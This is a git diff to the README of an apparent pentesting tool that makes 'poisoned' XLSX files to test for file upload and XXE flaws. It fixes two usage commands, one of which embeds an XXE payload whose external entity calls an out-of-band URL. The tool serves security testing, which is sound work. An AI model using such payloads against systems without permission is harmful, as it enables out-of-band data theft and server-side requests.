diff --git a/README.md b/README.md index 048c31a..185fe07 100644 --- a/README.md +++ b/README.md @@ -15,10 +15,10 @@ This tool is designed to test for file upload and XXE (XML External Entity) vuln Poison .XLSX file ☣️ ``` -python3 --file test.xlsx --xxe "<\!DOCTYPE ShiftSecurityConsulting [ <\!ENTITY xxe SYSTEM 'http://out-of-band.url'> ]>" --output poisoned.xlsx +python3 XXElixir.py --file test.xlsx --xxe "<\!DOCTYPE ShiftSecurityConsulting [ <\!ENTITY xxe SYSTEM 'http://out-of-band.url'> ]>" --output poisoned.xlsx ``` ``` -python3 --file test.xlsx --url https://shiftsecurityconsulting.com --output poisoned.xlsx +python3 XXElixir.py --file test.xlsx --url https://shiftsecurityconsulting.com --output poisoned.xlsx ``` ## Running from Docker 🐳